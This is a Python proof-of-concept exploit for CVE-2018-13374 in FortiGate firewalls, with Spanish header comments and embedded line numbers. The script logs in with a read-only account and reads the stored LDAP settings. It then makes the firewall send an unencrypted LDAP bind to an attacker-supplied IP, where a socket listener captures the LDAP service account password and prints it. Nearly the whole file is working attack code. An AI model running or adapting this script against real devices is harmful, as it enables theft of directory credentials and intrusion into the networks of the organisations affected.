#/usr/bin/python3"""CVE-2018-13374Publicado por Julio Ureña (PlainText)

1. #/usr/bin/python3
2.  
3. """
4. CVE-2018-13374
5. Publicado por Julio Ureña (PlainText)
6. Twitter: @JulioUrena
7. Blog Post: https://plaintext.do/My-1st-CVE-Capture-LDAP-Credentials-From-FortiGate-EN/
8. Referencia: https://fortiguard.com/psirt/FG-IR-18-157
9.  
10. Ejemplo: python3 CVE-2018-13374.py -f https://FortiGateIP -u usuario -p password -i MiIP
11. Ejemplo con Proxy: python3 CVE-2018-13374.py -f https://FortiGateIP -u usuario -p password -i MiIP --proxy http://127.0.0.1:8080
12. """
13.  
14. from threading import Thread
15. from time import sleep
16. import json, requests, socket, sys, re, click
17.  
18. # Disable SSL Warning
19. requests.packages.urllib3.disable_warnings()
20.  
21. # To keep the Cookies after login.
22. s = requests.Session()
23.  
24. def AccessFortiGate(fortigate_url, username, password, proxy_addr):
25. url_login = fortigate_url+'/logincheck'
26.  
27. # Pass username and Password
28. payload = {"ajax": 1, "username":username, "secretkey":password}
29.  
30. # verify=False - to avoid SSL warnings
31. r = s.post(url_login, data=payload, proxies=proxy_addr, verify=False)
32.  
33. if s.cookies:
34. return True
35. else:
36. return False
37.  
38.  
39. def TriggerVuln(fortigate_url, ip, proxy_addr):
40. print("[+] Triggering Vulnerability")
41. # Access LDAP Server TAB
42. r = s.get(fortigate_url+'/p/user/ldap/json/',cookies=requests.utils.dict_from_cookiejar(s.cookies), proxies=proxy_addr, verify=False)
43.  
44. # Load the response in a json object
45. json_data = json.loads(r.text)
46.  
47. # Assign values based on FortiGate LDAP configuration
48. name = json_data['source'][0]['name']
49. username = json_data['source'][0]['username']
50. port = int(json_data['source'][0]['port'])
51. cnid = json_data['source'][0]['cnid']
52. dn = json_data['source'][0]['dn']
53. ca = json_data['source'][0]['ca-cert']
54.  
55. thread = Thread(target = GetCreds, args = (ip, port))
56. thread.start()
57. sleep(1)
58.  
59. print("[+] Username: ", username)
60.  
61. # Create json object for the vulnerable request, changing the server and setting up secure to 0
62. ldap_request = {"info_only":1,"mkey":name,"ldap":{"server":ip,"port":port,"cn_id":cnid,"username":username,"dn":dn,"secure":0,"ca":ca,"type":2}}
63.  
64. # Trigger the vulnerability
65. r = s.get(fortigate_url+'/api/ldap?json='+str(ldap_request), cookies=requests.utils.dict_from_cookiejar(s.cookies),proxies=proxy_addr, verify=False)
66. r.close()
67.  
68. def GetCreds(server, port):
69. sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
70.  
71. # Allow to reuse the server/port in case of: OSError: [Errno 98] Address already in use
72. sock.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
73.  
74. server_address = (server, port)
75. sock.bind(server_address)
76.  
77. sock.listen()
78. credentials = ''
79.  
80. while True:
81. print('[+] Waiting Fortigate connection ...')
82. c, client_address = sock.accept()
83. try:
84. while True:
85. data = c.recv(1024)
86. credentials = str(data)
87. # \\x80\\ was common with 3 different passwords / user names, that's why it's been used as reference.
88. # It separe the username and the password
89. ldap_pass = re.sub(r'.*\\x80\\','',credentials) #.replace("'","")
90. print("[+] Password: ", ldap_pass[3:-1])
91. break
92. finally:
93. c.shutdown(socket.SHUT_RDWR)
94. c.close()
95. sock.shutdown(socket.SHUT_RDWR)
96. sock.close()
97.  
98. if credentials:
99. break
100.  
101. def print_help(self, param, value):
102. if value is False:
103. return
104. click.echo(self.get_help())
105. self.exit()
106.  
107. @click.command()
108. @click.option('-f', '--fortigate-url', 'fortigate_url', help='FortiGate URL.', required=True)
109. @click.option('-u', '--username', 'username', help='Username to login into Fortigate. It can be a read only user.', required=True)
110. @click.option('-p', '--password', 'password', help='Password to login into FortiGate.', required=True)
111. @click.option('-i', '--ip', 'ip', help='Host IP to send the credentails.', required=True)
112. @click.option('-pr', '--proxy', 'proxy', default=None, help='Proxy protocol and IP and Port.', required=False)
113. @click.option('-h', '--help', 'help', help='Help', is_flag=True, callback=print_help, expose_value=False, is_eager=False)
114. @click.pass_context
115.  
116.  
117. def main(self, fortigate_url, username, password, ip, proxy):
118. if not fortigate_url and not username and not password:
119. print_help(self, None, value=True)
120. print("[-] For usage reference use --help")
121. exit(0)
122.  
123. # Configure Proxy For Web Requests
124. proxy_addr = {
125. 'http': proxy,
126. 'https': proxy
127. }
128. message = """[+] CVE-2018-13374
129. [+] Publicado por Julio Ureña (PlainText)
130. [+] Blog: https://plaintext.do
131. [+] Referencia: https://fortiguard.com/psirt/FG-IR-18-157
132. """
133. print(message)
134.  
135. if AccessFortiGate(str(fortigate_url),username, password, proxy_addr):
136. print("[+] Logged in.")
137. sleep(1)
138. TriggerVuln(str(fortigate_url), ip, proxy_addr)
139. else:
140. print("[-] Unable to login. Please check the credentials and Fortigate URL.")
141. exit(0)
142.  
143. if __name__ == "__main__":
144. main()